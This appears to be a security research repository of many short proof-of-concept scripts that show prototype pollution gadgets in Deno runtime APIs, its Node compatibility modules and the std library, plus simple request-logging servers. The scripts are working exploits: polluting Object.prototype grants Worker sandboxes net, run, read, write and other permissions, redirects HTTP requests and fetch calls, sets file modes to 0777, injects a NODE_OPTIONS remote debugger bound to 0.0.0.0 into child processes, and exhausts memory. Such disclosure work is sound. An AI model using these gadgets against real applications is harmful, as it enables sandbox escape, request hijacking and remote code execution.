23 | Deno.remove(`./${name}`);
24 | }
25 |
26 | await create("unpolluted");
27 | await create("polluted");
28 |
29 | await writeThenRead("unpolluted");
30 | pollute("append", true);
31 | await writeThenRead("polluted");
32 |
--------------------------------------------------------------------------------
/deno/Deno/writeFile/writeFile.mode.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = new TextEncoder().encode("foobar");
6 |
7 | async function create(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(data);
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | await Deno.writeFile(`./${name}`, data);
15 |
16 | const fileInfo = await Deno.stat(`./${name}`);
17 | console.log(name, "mode:", fileInfo.mode);
18 |
19 | Deno.remove(`./${name}`);
20 | }
21 |
22 | await create("unpolluted-exists");
23 | await create("polluted-exists");
24 |
25 | await writeThenRead("unpolluted-new");
26 | await writeThenRead("unpolluted-exists");
27 | pollute("mode", 0o777);
28 | await writeThenRead("polluted-new");
29 | await writeThenRead("polluted-exists");
30 |
--------------------------------------------------------------------------------
/deno/Deno/writeFile/writeFileSync.append.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = new TextEncoder().encode("foobar");
6 |
7 | async function create(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(data);
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | Deno.writeFileSync(`./${name}`, data);
15 |
16 | const file = await Deno.open(`./${name}`, { read: true, append: false });
17 | const buffer = new Uint8Array(16);
18 | const count = await file.read(buffer);
19 | const text = new TextDecoder().decode(buffer);
20 | console.log(name, "contains", text, `(${count} bytes)`);
21 | file.close();
22 |
23 | Deno.remove(`./${name}`);
24 | }
25 |
26 | await create("unpolluted");
27 | await create("polluted");
28 |
29 | await writeThenRead("unpolluted");
30 | pollute("append", true);
31 | await writeThenRead("polluted");
32 |
--------------------------------------------------------------------------------
/deno/Deno/writeFile/writeFileSync.mode.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = new TextEncoder().encode("foobar");
6 |
7 | async function create(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(data);
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | Deno.writeFileSync(`./${name}`, data);
15 |
16 | const fileInfo = await Deno.stat(`./${name}`);
17 | console.log(name, "mode:", fileInfo.mode);
18 |
19 | Deno.remove(`./${name}`);
20 | }
21 |
22 | await create("unpolluted-exists");
23 | await create("polluted-exists");
24 |
25 | await writeThenRead("unpolluted-new");
26 | await writeThenRead("unpolluted-exists");
27 | pollute("mode", 0o777);
28 | await writeThenRead("polluted-new");
29 | await writeThenRead("polluted-exists");
30 |
--------------------------------------------------------------------------------
/deno/Deno/writeTextFile/writeTextFile.append.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = "foobar";
6 |
7 | async function create(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(new TextEncoder().encode(data));
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | await Deno.writeTextFile(`./${name}`, data);
15 |
16 | const file = await Deno.open(`./${name}`, { read: true, append: false });
17 | const buffer = new Uint8Array(16);
18 | const count = await file.read(buffer);
19 | const text = new TextDecoder().decode(buffer);
20 | console.log(name, "contains", text, `(${count} bytes)`);
21 | file.close();
22 |
23 | Deno.remove(`./${name}`);
24 | }
25 |
26 | await create("unpolluted");
27 | await create("polluted");
28 |
29 | await writeThenRead("unpolluted");
30 | pollute("append", true);
31 | await writeThenRead("polluted");
32 |
--------------------------------------------------------------------------------
/deno/Deno/writeTextFile/writeTextFile.mode.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = "foobar";
6 |
7 | async function create(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(new TextEncoder().encode(data));
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | await Deno.writeTextFile(`./${name}`, data);
15 |
16 | const fileInfo = await Deno.stat(`./${name}`);
17 | console.log(name, "mode:", fileInfo.mode);
18 |
19 | Deno.remove(`./${name}`);
20 | }
21 |
22 | await create("unpolluted-exists");
23 | await create("polluted-exists");
24 |
25 | await writeThenRead("unpolluted-new");
26 | await writeThenRead("unpolluted-exists");
27 | pollute("mode", 0o777);
28 | await writeThenRead("polluted-new");
29 | await writeThenRead("polluted-exists");
30 |
--------------------------------------------------------------------------------
/deno/Deno/writeTextFile/writeTextFileSync.append.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = "foobar";
6 |
7 | async function create(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(new TextEncoder().encode(data));
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | Deno.writeTextFile(`./${name}`, data);
15 |
16 | const file = await Deno.open(`./${name}`, { read: true, append: false });
17 | const buffer = new Uint8Array(16);
18 | const count = await file.read(buffer);
19 | const text = new TextDecoder().decode(buffer);
20 | console.log(name, "contains", text, `(${count} bytes)`);
21 | file.close();
22 |
23 | Deno.remove(`./${name}`);
24 | }
25 |
26 | await create("unpolluted");
27 | await create("polluted");
28 |
29 | await writeThenRead("unpolluted");
30 | pollute("append", true);
31 | await writeThenRead("polluted");
32 |
--------------------------------------------------------------------------------
/deno/Deno/writeTextFile/writeTextFileSync.mode.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = "foobar";
6 |
7 | async function create(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(new TextEncoder().encode(data));
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | Deno.writeTextFileSync(`./${name}`, data);
15 |
16 | const fileInfo = await Deno.stat(`./${name}`);
17 | console.log(name, "mode:", fileInfo.mode);
18 |
19 | Deno.remove(`./${name}`);
20 | }
21 |
22 | await create("unpolluted-exists");
23 | await create("polluted-exists");
24 |
25 | await writeThenRead("unpolluted-new");
26 | await writeThenRead("unpolluted-exists");
27 | pollute("mode", 0o777);
28 | await writeThenRead("polluted-new");
29 | await writeThenRead("polluted-exists");
30 |
--------------------------------------------------------------------------------
/deno/Worker/.gitignore:
--------------------------------------------------------------------------------
1 | worker.ts
2 |
--------------------------------------------------------------------------------
/deno/Worker/Worker.env.PoC.ts:
--------------------------------------------------------------------------------
1 | // Create worker on the fly
2 | Deno.writeTextFileSync(
3 | "./worker.ts",
4 | "console.log(await Deno.permissions.query({ name: 'env' }));" +
5 | "console.log('DENO_INSTALL_ROOT:', Deno.env.get('DENO_INSTALL_ROOT'));" +
6 | "Deno.exit(1);",
7 | { create: true },
8 | );
9 |
10 |
11 | // PoC
12 | function pollute(key: string, value: any) {
13 | ((((Object as any).prototype as any)[key]) as any) = value;
14 | }
15 |
16 | pollute("env", true);
17 | new Worker(
18 | import.meta.resolve("./worker.ts"),
19 | { type: "module", deno: { permissions: {/*some object*/} } },
20 | );
21 |
--------------------------------------------------------------------------------
/deno/Worker/Worker.ffi.PoC.ts:
--------------------------------------------------------------------------------
1 | // Create worker on the fly
2 | Deno.writeTextFileSync(
3 | "./worker.ts",
4 | "console.log(await Deno.permissions.query({ name: 'ffi' }));" +
5 | "Deno.exit(1);",
6 | { create: true },
7 | );
8 |
9 |
10 | // PoC
11 | function pollute(key: string, value: any) {
12 | ((((Object as any).prototype as any)[key]) as any) = value;
13 | }
14 |
15 | pollute("ffi", true);
16 | new Worker(
17 | import.meta.resolve("./worker.ts"),
18 | { type: "module", deno: { permissions: {/*some object*/} } },
19 | );
20 |
--------------------------------------------------------------------------------
/deno/Worker/Worker.hrtime.PoC.ts:
--------------------------------------------------------------------------------
1 | // Create worker on the fly
2 | Deno.writeTextFileSync(
3 | "./worker.ts",
4 | "console.log(await Deno.permissions.query({ name: 'hrtime' }));" +
5 | "console.log('start time:', performance.mark('start').startTime);" +
6 | "Deno.exit(1);",
7 | { create: true },
8 | );
9 |
10 |
11 | // PoC
12 | function pollute(key: string, value: any) {
13 | ((((Object as any).prototype as any)[key]) as any) = value;
14 | }
15 |
16 | pollute("hrtime", true);
17 | new Worker(
18 | import.meta.resolve("./worker.ts"),
19 | { type: "module", deno: { permissions: {/*some object*/} } },
20 | );
21 |
--------------------------------------------------------------------------------
/deno/Worker/Worker.net.PoC.ts:
--------------------------------------------------------------------------------
1 | // Create worker on the fly
2 | Deno.writeTextFileSync(
3 | "./worker.ts",
4 | "console.log(await Deno.permissions.query({ name: 'net' }));" +
5 | "console.log(await fetch('https://deno.com/'));" +
6 | "Deno.exit(1);",
7 | { create: true },
8 | );
9 |
10 | // PoC
11 | function pollute(key: string, value: any) {
12 | ((((Object as any).prototype as any)[key]) as any) = value;
13 | }
14 |
15 | pollute("net", true);
16 | new Worker(
17 | import.meta.resolve("./worker.ts"),
18 | { type: "module", deno: { permissions: {/*some object*/} } },
19 | );
20 |
--------------------------------------------------------------------------------
/deno/Worker/Worker.read.PoC.ts:
--------------------------------------------------------------------------------
1 | // Create worker on the fly
2 | Deno.writeTextFileSync(
3 | "./worker.ts",
4 | "console.log(await Deno.permissions.query({ name: 'read' }));" +
5 | "console.log('Worker code:', Deno.readTextFileSync('./worker.ts'));" +
6 | "Deno.exit(1);",
7 | { create: true },
8 | );
9 |
10 |
11 | // PoC
12 | function pollute(key: string, value: any) {
13 | ((((Object as any).prototype as any)[key]) as any) = value;
14 | }
15 |
16 | pollute("read", true);
17 | new Worker(
18 | import.meta.resolve("./worker.ts"),
19 | { type: "module", deno: { permissions: {/*some object*/} } },
20 | );
21 |
--------------------------------------------------------------------------------
/deno/Worker/Worker.run.PoC.ts:
--------------------------------------------------------------------------------
1 | // Create worker on the fly
2 | Deno.writeTextFileSync(
3 | "./worker.ts",
4 | "console.log(await Deno.permissions.query({ name: 'run' }));" +
5 | "(new Deno.Command('ls')).spawn();" +
6 | "Deno.exit(1);",
7 | { create: true },
8 | );
9 |
10 |
11 | // PoC
12 | function pollute(key: string, value: any) {
13 | ((((Object as any).prototype as any)[key]) as any) = value;
14 | }
15 |
16 | pollute("run", true);
17 | new Worker(
18 | import.meta.resolve("./worker.ts"),
19 | { type: "module", deno: { permissions: {/*some object*/} } },
20 | );
21 |
--------------------------------------------------------------------------------
/deno/Worker/Worker.sys.PoC.ts:
--------------------------------------------------------------------------------
1 | // Create worker on the fly
2 | Deno.writeTextFileSync(
3 | "./worker.ts",
4 | "console.log(await Deno.permissions.query({ name: 'sys' }));" +
5 | "console.log(Deno.osRelease());" +
6 | "Deno.exit(1);",
7 | { create: true },
8 | );
9 |
10 | // PoC
11 | function pollute(key: string, value: any) {
12 | ((((Object as any).prototype as any)[key]) as any) = value;
13 | }
14 |
15 | pollute("sys", true);
16 | new Worker(
17 | import.meta.resolve("./worker.ts"),
18 | { type: "module", deno: { permissions: {/*some object*/} } },
19 | );
20 |
--------------------------------------------------------------------------------
/deno/Worker/Worker.write.PoC.ts:
--------------------------------------------------------------------------------
1 | // Create worker on the fly
2 | Deno.writeTextFileSync(
3 | "./worker.ts",
4 | "console.log(await Deno.permissions.query({ name: 'write' }));" +
5 | "Deno.writeTextFileSync('./worker.ts', 'foobar');" +
6 | "Deno.exit(1);",
7 | { create: true },
8 | );
9 |
10 |
11 | // PoC
12 | function pollute(key: string, value: any) {
13 | ((((Object as any).prototype as any)[key]) as any) = value;
14 | }
15 |
16 | pollute("write", true);
17 | new Worker(
18 | import.meta.resolve("./worker.ts"),
19 | { type: "module", deno: { permissions: {/*some object*/} } },
20 | );
21 | setTimeout(() => console.log(Deno.readTextFileSync('./worker.ts')), 500);
22 |
--------------------------------------------------------------------------------
/deno/fetch/fetch.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("0", "https://github.com");
6 | pollute("method", "POST");
7 | pollute("body", "Hello world!");
8 | pollute("headers", {
9 | "foo": "bar",
10 | "content-type": "plaintext",
11 | });
12 |
13 | const response = await fetch("https://deno.land/");
14 | console.log(response);
15 |
--------------------------------------------------------------------------------
/deno/node/child_process/exec.env.PoC.ts:
--------------------------------------------------------------------------------
1 | import { exec } from "node:child_process";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("shell", "node");
8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" });
9 |
10 | const process = exec("echo 'Hello world!'");
11 | process.stdout.on("data", (data) => console.log(data.toString()));
12 |
--------------------------------------------------------------------------------
/deno/node/child_process/execFileSync.env.PoC.ts:
--------------------------------------------------------------------------------
1 | import { execFileSync } from "node:child_process";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("shell", "node");
8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" });
9 |
10 | const process = execFileSync("echo", ["Hello", "world!"]);
11 | console.log(process.toString());
12 |
--------------------------------------------------------------------------------
/deno/node/child_process/execSync.env.PoC.ts:
--------------------------------------------------------------------------------
1 | import { execSync } from "node:child_process";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("shell", "node");
8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" });
9 |
10 | const process = execSync("echo 'Hello world!'");
11 | console.log(process.toString());
12 |
--------------------------------------------------------------------------------
/deno/node/child_process/spawn.env.PoC.ts:
--------------------------------------------------------------------------------
1 | import { spawn } from "node:child_process";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("shell", "node");
8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" });
9 |
10 | const process = spawn("echo", ["Hello", "world!"]);
11 | process.stdout.on("data", (data) => console.log(data.toString()));
12 |
--------------------------------------------------------------------------------
/deno/node/child_process/spawn.gid.PoC.ts:
--------------------------------------------------------------------------------
1 | import { spawn } from "node:child_process";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("gid", 42);
8 |
9 | const process = spawn("id");
10 | process.stdout.on("data", (data) => console.log(data.toString()));
11 |
--------------------------------------------------------------------------------
/deno/node/child_process/spawn.uid.PoC.ts:
--------------------------------------------------------------------------------
1 | import { spawn } from "node:child_process";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("uid", 42);
8 |
9 | const process = spawn("id");
10 | process.stdout.on("data", (data) => console.log(data.toString()));
11 |
--------------------------------------------------------------------------------
/deno/node/child_process/spawnSync.env.PoC.ts:
--------------------------------------------------------------------------------
1 | import { spawnSync } from "node:child_process";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("shell", "node");
8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" });
9 |
10 | const process = spawnSync("echo", ["Hello", "world!"]);
11 | console.log(process.stdout.toString());
12 |
--------------------------------------------------------------------------------
/deno/node/fs/appendFile.length.PoC.ts:
--------------------------------------------------------------------------------
1 | import { appendFile } from "node:fs";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | const data = "foobar";
8 |
9 | // NOTE: must be larger then the length of what is being written
10 | pollute("length", data.length + 1);
11 |
12 | appendFile("./file", data, () => {});
13 |
--------------------------------------------------------------------------------
/deno/node/fs/appendFile.offset.PoC.ts:
--------------------------------------------------------------------------------
1 | import { appendFile } from "node:fs";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | // NOTE: must be large to consume a lot of memory
8 | pollute("offset", 0xFFFFFFFF);
9 |
10 | appendFile("./file", "foobar", () => { });
11 |
--------------------------------------------------------------------------------
/deno/node/fs/writeFile.length.PoC.ts:
--------------------------------------------------------------------------------
1 | import { writeFile } from "node:fs";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | const data = "foobar";
8 |
9 | // NOTE: must be larger then the length of what is being written
10 | pollute("length", data.length + 1);
11 |
12 | writeFile("./file", data, () => {});
13 |
--------------------------------------------------------------------------------
/deno/node/fs/writeFile.offset.PoC.ts:
--------------------------------------------------------------------------------
1 | import { writeFile } from "node:fs";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | // NOTE: must be large to consume a lot of memory
8 | pollute("offset", 0xFFFFFFFF);
9 |
10 | writeFile("./file", "foobar", () => {});
11 |
--------------------------------------------------------------------------------
/deno/node/http/request.hostname.PoC.ts:
--------------------------------------------------------------------------------
1 | import http from "node:http";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("hostname", "example.com");
8 | pollute("port", "80");
9 | pollute("method", "POST");
10 | pollute("path", "/");
11 |
12 | http.request(
13 | { host: "deno.land" },
14 | (res) => {
15 | res.setEncoding("utf8");
16 | res.on("data", console.log);
17 | },
18 | ).end();
19 |
--------------------------------------------------------------------------------
/deno/node/https/request.hostname.PoC.ts:
--------------------------------------------------------------------------------
1 | import https from "node:https";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("hostname", "example.com");
8 | pollute("port", "443");
9 | pollute("method", "POST");
10 | pollute("path", "/");
11 |
12 | https.request(
13 | { host: "deno.land" },
14 | (res) => {
15 | res.setEncoding("utf8");
16 | res.on("data", console.log);
17 | },
18 | ).end();
19 |
--------------------------------------------------------------------------------
/deno/node/zlib/createBrotliCompress.params.PoC.ts:
--------------------------------------------------------------------------------
1 | import { createBrotliCompress } from "node:zlib";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("params", "any string");
8 |
9 | createBrotliCompress();
10 |
--------------------------------------------------------------------------------
/deno/std/dotenv/.env:
--------------------------------------------------------------------------------
1 | foo=bar
2 |
--------------------------------------------------------------------------------
/deno/std/dotenv/.env.default:
--------------------------------------------------------------------------------
1 | hello=world!
2 |
--------------------------------------------------------------------------------
/deno/std/dotenv/.env.other:
--------------------------------------------------------------------------------
1 | foo=baz
2 |
--------------------------------------------------------------------------------
/deno/std/dotenv/load.any.PoC.ts:
--------------------------------------------------------------------------------
1 | import { load } from "https://deno.land/std@0.204.0/dotenv/mod.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | await load({ export: true });
8 | console.log(Deno.env.get("foo"));
9 | console.log(Deno.env.get("hello"));
10 |
11 | pollute("hello", "world");
12 |
13 | await load({ export: true });
14 | console.log(Deno.env.get("foo"));
15 | console.log(Deno.env.get("hello"));
16 |
--------------------------------------------------------------------------------
/deno/std/dotenv/load.defaultsPath.PoC.ts:
--------------------------------------------------------------------------------
1 | import { load } from "https://deno.land/std@0.216.0/dotenv/mod.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | const unpolluted = await load();
8 | console.log(unpolluted);
9 |
10 | pollute("defaultsPath", "./.env.default");
11 |
12 | const polluted = await load();
13 | console.log(polluted);
14 |
--------------------------------------------------------------------------------
/deno/std/dotenv/load.envPath.PoC.ts:
--------------------------------------------------------------------------------
1 | import { load } from "https://deno.land/std@0.216.0/dotenv/mod.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | const unpolluted = await load();
8 | console.log(unpolluted);
9 |
10 | pollute("envPath", "./.env.other");
11 |
12 | const polluted = await load();
13 | console.log(polluted);
14 |
--------------------------------------------------------------------------------
/deno/std/dotenv/load.export.PoC.ts:
--------------------------------------------------------------------------------
1 | import { load } from "https://deno.land/std@0.216.0/dotenv/mod.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | await load();
8 | console.log(Deno.env.get("foo"));
9 |
10 | pollute("export", true);
11 |
12 | await load();
13 | console.log(Deno.env.get("foo"));
14 |
--------------------------------------------------------------------------------
/deno/std/dotenv/loadSync.any.PoC.ts:
--------------------------------------------------------------------------------
1 | import { loadSync } from "https://deno.land/std@0.204.0/dotenv/mod.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | loadSync({export: true});
8 | console.log(Deno.env.get("foo"));
9 | console.log(Deno.env.get("hello"));
10 |
11 | pollute("hello", "world");
12 |
13 | loadSync({export: true});
14 | console.log(Deno.env.get("foo"));
15 | console.log(Deno.env.get("hello"));
16 |
--------------------------------------------------------------------------------
/deno/std/dotenv/loadSync.defaultsPath.PoC.ts:
--------------------------------------------------------------------------------
1 | import { loadSync } from "https://deno.land/std@0.216.0/dotenv/mod.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | const unpolluted = loadSync();
8 | console.log(unpolluted);
9 |
10 | pollute("defaultsPath", "./.env.default");
11 |
12 | const polluted = loadSync();
13 | console.log(polluted);
14 |
--------------------------------------------------------------------------------
/deno/std/dotenv/loadSync.envPath.PoC.ts:
--------------------------------------------------------------------------------
1 | import { loadSync } from "https://deno.land/std@0.216.0/dotenv/mod.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | const unpolluted = loadSync();
8 | console.log(unpolluted);
9 |
10 | pollute("envPath", "./.env.other");
11 |
12 | const polluted = loadSync();
13 | console.log(polluted);
14 |
--------------------------------------------------------------------------------
/deno/std/dotenv/loadSync.export.PoC.ts:
--------------------------------------------------------------------------------
1 | import { loadSync } from "https://deno.land/std@0.216.0/dotenv/mod.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | loadSync();
8 | console.log(Deno.env.get("foo"));
9 |
10 | pollute("export", true);
11 |
12 | loadSync();
13 | console.log(Deno.env.get("foo"));
14 |
--------------------------------------------------------------------------------
/deno/std/json/JsonStringifyStream.prefix.PoC.ts:
--------------------------------------------------------------------------------
1 | import { JsonStringifyStream } from "https://deno.land/std@0.216.0/json/json_stringify_stream.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("prefix", '{"hello":"world!"}//');
8 |
9 | const stream = ReadableStream.from([{ foo: "bar" }]);
10 | for await (const data of stream.pipeThrough(new JsonStringifyStream())) {
11 | console.log(data);
12 | }
13 |
--------------------------------------------------------------------------------
/deno/std/json/JsonStringifyStream.suffix.PoC.ts:
--------------------------------------------------------------------------------
1 | import { JsonStringifyStream } from "https://deno.land/std@0.216.0/json/json_stringify_stream.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("suffix", '\r{"hello":"world!"}');
8 |
9 | const stream = ReadableStream.from([{ foo: "bar" }]);
10 | for await (const data of stream.pipeThrough(new JsonStringifyStream())) {
11 | console.log(data);
12 | }
13 |
--------------------------------------------------------------------------------
/deno/std/log/FileHandler.formatter.PoC.ts:
--------------------------------------------------------------------------------
1 | import * as log from "https://deno.land/std@0.213.0/log/mod.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | pollute("formatter", "Hello world!");
8 |
9 | const fileHandler = new log.FileHandler("DEBUG", { filename: "./example.log" });
10 | fileHandler.setup();
11 | fileHandler.handle(
12 | new log.LogRecord({
13 | msg: "foobar",
14 | args: [],
15 | level: log.LogLevels.DEBUG,
16 | }),
17 | );
18 |
--------------------------------------------------------------------------------
/deno/std/tar/Tar.gid.PoC.ts:
--------------------------------------------------------------------------------
1 | import { Tar } from "https://deno.land/std@0.204.0/archive/tar.ts";
2 | import { Untar } from "https://deno.land/std@0.204.0/archive/untar.ts";
3 | import { Buffer } from "https://deno.land/std@0.204.0/io/mod.ts";
4 |
5 | function pollute(key: string, value: any) {
6 | ((((Object as any).prototype as any)[key]) as any) = value;
7 | }
8 |
9 | const content = new TextEncoder().encode("Hello world!");
10 |
11 | pollute("gid", 42);
12 |
13 | const tar = new Tar();
14 | await tar.append("output.txt", {
15 | reader: new Buffer(content),
16 | contentSize: content.byteLength,
17 | });
18 | const untar = new Untar(tar.getReader());
19 | const result = await untar.extract();
20 | console.log("gid is", result.gid);
21 |
--------------------------------------------------------------------------------
/deno/std/tar/Tar.uid.PoC.ts:
--------------------------------------------------------------------------------
1 | import { Tar } from "https://deno.land/std@0.204.0/archive/tar.ts";
2 | import { Untar } from "https://deno.land/std@0.204.0/archive/untar.ts";
3 | import { Buffer } from "https://deno.land/std@0.204.0/io/mod.ts";
4 |
5 | function pollute(key: string, value: any) {
6 | ((((Object as any).prototype as any)[key]) as any) = value;
7 | }
8 |
9 | const content = new TextEncoder().encode("Hello world!");
10 |
11 | pollute("uid", 42);
12 |
13 | const tar = new Tar();
14 | await tar.append("output.txt", {
15 | reader: new Buffer(content),
16 | contentSize: content.byteLength,
17 | });
18 | const untar = new Untar(tar.getReader());
19 | const result = await untar.extract();
20 | console.log("uid is", result.uid);
21 |
--------------------------------------------------------------------------------
/deno/std/yaml/stringify.indent.PoC.ts:
--------------------------------------------------------------------------------
1 | import { stringify } from "https://deno.land/std@0.216.0/yaml/stringify.ts";
2 |
3 | function pollute(key: string, value: any) {
4 | ((((Object as any).prototype as any)[key]) as any) = value;
5 | }
6 |
7 | // NOTE: must be large to consume a lot of memory
8 | pollute("indent", 0xFFFFFFFF);
9 |
10 | stringify({ obj: { foo: "bar" } });
11 |
--------------------------------------------------------------------------------
/http-server.js:
--------------------------------------------------------------------------------
1 | const http = require('http');
2 |
3 | const server = http.createServer((req, res) => {
4 | console.log('Received request:');
5 | console.log('Method:', req.method);
6 | console.log('URL:', req.url);
7 | console.log('Headers:', req.headers);
8 |
9 | // Collecting request body data
10 | let body = [];
11 | req.on('data', chunk => {
12 | body.push(chunk);
13 | }).on('end', () => {
14 | body = Buffer.concat(body).toString();
15 | console.log('Body:', body);
16 | console.log('==========================================================');
17 |
18 | // Sending response
19 | res.writeHead(200, {'Content-Type': 'text/plain'});
20 | res.end('Request received and logged.');
21 | });
22 | });
23 |
24 | server.listen(3000, () => {
25 | console.log('Server running on port 3000');
26 | });
27 |
--------------------------------------------------------------------------------
/https-server.js:
--------------------------------------------------------------------------------
1 | const https = require('https');
2 | const fs = require('fs');
3 |
4 | const options = {
5 | key: fs.readFileSync('key.pem'),
6 | cert: fs.readFileSync('cert.pem')
7 | };
8 |
9 | https.createServer(options, (req, res) => {
10 | console.log('Received request:');
11 | console.log('Method:', req.method);
12 | console.log('URL:', req.url);
13 | console.log('Headers:', req.headers);
14 |
15 | // Collecting request body data
16 | let body = [];
17 | req.on('data', chunk => {
18 | body.push(chunk);
19 | }).on('end', () => {
20 | body = Buffer.concat(body).toString();
21 | console.log('Body:', body);
22 | console.log('==========================================================');
23 |
24 | // Check for 'auth' header
25 | const authHeader = req.headers['auth'];
26 | if (!authHeader) {
27 | res.writeHead(200);
28 | res.end('Hello world\n');
29 | return;
30 | }
31 |
32 | // Generate a simple secret related to the 'auth' value
33 | const secret = `secret-${authHeader}\n`;
34 |
35 | // Respond with the generated secret
36 | res.writeHead(200, { 'Content-Type': 'text/plain' });
37 | res.end(`Your secret: ${secret}`);
38 | });
39 | }).listen(443, () => console.log('Server running on https://localhost:443'));
40 |
--------------------------------------------------------------------------------
/nodejs/child_process/exec.env.PoC.js:
--------------------------------------------------------------------------------
1 | const { exec } = require('child_process');
2 |
3 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
4 |
5 | const spawnedProcess = exec('node -e "console.log(`NORMAL EXECUTION`)"', {env: {... process.env, AAA: "BBB" }});
6 |
7 | spawnedProcess.stdout.on('data', (data) => {
8 | console.log(`Output: ${data}`);
9 | });
10 |
11 | spawnedProcess.stderr.on('data', (data) => {
12 | console.error(`Error: ${data}`);
13 | });
14 |
15 | spawnedProcess.on('close', (code) => {
16 | console.log(`Process exited with code ${code}`);
17 | });
18 |
19 | spawnedProcess.on('error', (err) => {
20 | console.error(`Spawned process error: ${err}`);
21 | });
--------------------------------------------------------------------------------
/nodejs/child_process/execFile.env.PoC.js:
--------------------------------------------------------------------------------
1 | const { execFile } = require('child_process');
2 |
